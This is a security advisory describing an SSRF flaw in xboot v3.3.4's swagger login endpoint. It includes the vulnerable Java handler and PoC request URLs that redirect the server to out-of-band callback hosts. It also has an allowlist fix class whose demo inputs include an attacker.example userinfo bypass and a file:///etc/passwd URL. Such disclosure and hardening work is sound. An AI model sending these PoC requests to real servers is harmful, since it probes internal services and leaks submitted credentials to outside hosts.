Summary
An SSRF vulnerability was discovered on the endpoint /xboot/common/swagger/login in the latest version (v3.3.4) of xboot. The loginUrl parameter, which sets the target URI of a server-side network request, is user-controllable and is not validated, so an attacker can make the server send requests to internal services of the target system and probe or exploit them.
Details
@RestController
@Api(tags = "Security相关接口")
@RequestMapping("/xboot/common")
@Transactional
public class SecurityController {

    @RequestMapping(value = "/needLogin", method = RequestMethod.GET)
    @ApiOperation(value = "没有登录")
    public Result<Object> needLogin() {
        return ResultUtil.error(401, "您还未登录");
    }

    @RequestMapping(value = "/swagger/login", method = RequestMethod.GET)
    @ApiOperation(value = "Swagger接口文档专用登录接口 方便测试")
    public Result<Object> swaggerLogin(@RequestParam String username, @RequestParam String password,
                                       @ApiParam("图片验证码ID") @RequestParam(required = false) String captchaId,
                                       @ApiParam("验证码") @RequestParam(required = false) String code,
                                       @ApiParam("记住密码") @RequestParam(required = false, defaultValue = "true") Boolean saveLogin,
                                       // loginUrl is taken straight from the query string; only its default is safe
                                       @ApiParam("可自定义登录接口地址")
                                       @RequestParam(required = false, defaultValue = "http://127.0.0.1:8888/xboot/login")
                                       String loginUrl) {
        Map<String, Object> params = new HashMap<>(16);
        params.put("username", username);
        params.put("password", password);
        params.put("captchaId", captchaId);
        params.put("code", code);
        params.put("saveLogin", saveLogin);
        // The server POSTs the submitted parameters to whatever URL the caller supplied,
        // with no scheme, host, port or path check: this is the SSRF sink.
        String result = HttpUtil.post(loginUrl, params);
        // The response body of that request is returned to the caller unchanged.
        return ResultUtil.data(result);
    }
}
POC
http://localhost:9999/xboot/common/swagger/login?loginUrl=https://dnslog/&username=x&password=x
http://localhost:9999/xboot/common/swagger/login?loginUrl=https://d1vif4ev0le7bmrt4se0gjs1qcw1a5jgw.oast.me&username=x&password=x
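The handler only ever needs to reach its own login endpoint, so the narrowest fix is to drop the loginUrl parameter and hard-code the default. Where the parameter has to stay for compatibility, the request target should be allowlisted before HttpUtil.post() runs. The class below is an added example written for this advisory, not xboot's own code: LoginUrlPolicy, isAllowed and the ALLOWED_* constants are hypothetical names, and the policy values are taken from the handler's default URL. It pins scheme, host, port and path, rejects userinfo forms and unparsable input, and fails closed; the main method runs it against the default URL, the advisory's first PoC target and a few constructed inputs.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Set;

// Added example (not xboot's code): a strict allowlist for the loginUrl
// parameter of /xboot/common/swagger/login. Anything other than the handler's
// own login endpoint is rejected before a server-side request is made.
public final class LoginUrlPolicy {

    // Assumed policy values, derived from the handler's default loginUrl.
    // Set.of requires Java 9 or later.
    private static final Set<String> ALLOWED_HOSTS = Set.of("127.0.0.1", "localhost");
    private static final int ALLOWED_PORT = 8888;
    private static final String ALLOWED_PATH = "/xboot/login";

    /** Returns true only for http://127.0.0.1:8888/xboot/login (or localhost). */
    public static boolean isAllowed(String loginUrl) {
        if (loginUrl == null || loginUrl.isEmpty()) {
            return false;
        }
        final URI uri;
        try {
            uri = new URI(loginUrl);
        } catch (URISyntaxException e) {
            return false;                       // unparsable input: fail closed
        }
        // Scheme pinned to plain http, which is what the default target uses;
        // every other scheme only widens what the server will fetch.
        if (!"http".equalsIgnoreCase(uri.getScheme())) {
            return false;
        }
        // "user:pass@host" forms are rejected outright rather than parsed.
        if (uri.getRawUserInfo() != null) {
            return false;
        }
        // getHost() is null for relative or malformed URLs; IPv6 literals such as
        // "[::1]" are returned with brackets and so never match the allowlist.
        String host = uri.getHost();
        if (host == null || !ALLOWED_HOSTS.contains(host.toLowerCase())) {
            return false;
        }
        int port = uri.getPort() == -1 ? 80 : uri.getPort();
        if (port != ALLOWED_PORT) {
            return false;
        }
        // Exact path match; getPath() returns the decoded path, so percent-encoded
        // variants of the same path compare equal and unrelated paths do not.
        return ALLOWED_PATH.equals(uri.getPath());
    }

    // Demonstration: the handler's default, the advisory's PoC target, and
    // constructed inputs that exercise each check.
    public static void main(String[] args) {
        String[] candidates = {
            "http://127.0.0.1:8888/xboot/login",               // handler default -> allowed
            "https://dnslog/",                                  // PoC target from the advisory -> rejected (scheme, host)
            "http://127.0.0.1:8888@attacker.example/xboot/login", // constructed userinfo form -> rejected
            "http://127.0.0.1:8080/xboot/login",                // constructed: wrong port -> rejected
            "http://localhost:8888/xboot/other",                // constructed: wrong path -> rejected
            "file:///etc/passwd",                               // constructed: wrong scheme -> rejected
        };
        for (String c : candidates) {
            System.out.printf("%-55s -> %s%n", c, isAllowed(c) ? "allowed" : "rejected");
        }
    }
}
```

In the handler, the check would sit immediately before the HttpUtil.post call, returning an error result when isAllowed(loginUrl) is false. The allowlist is deliberately exact rather than a "starts with http://127.0.0.1" prefix test, since prefix tests are what the userinfo and port cases above defeat. Note that the PoC also sends the submitted username and password to the chosen host, so a request log showing loginUrl values other than the default is worth alerting on even after the fix is deployed.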
Impact
https://portswigger.net/web-security/ssrf#what-is-the-impact-of-ssrf-attacks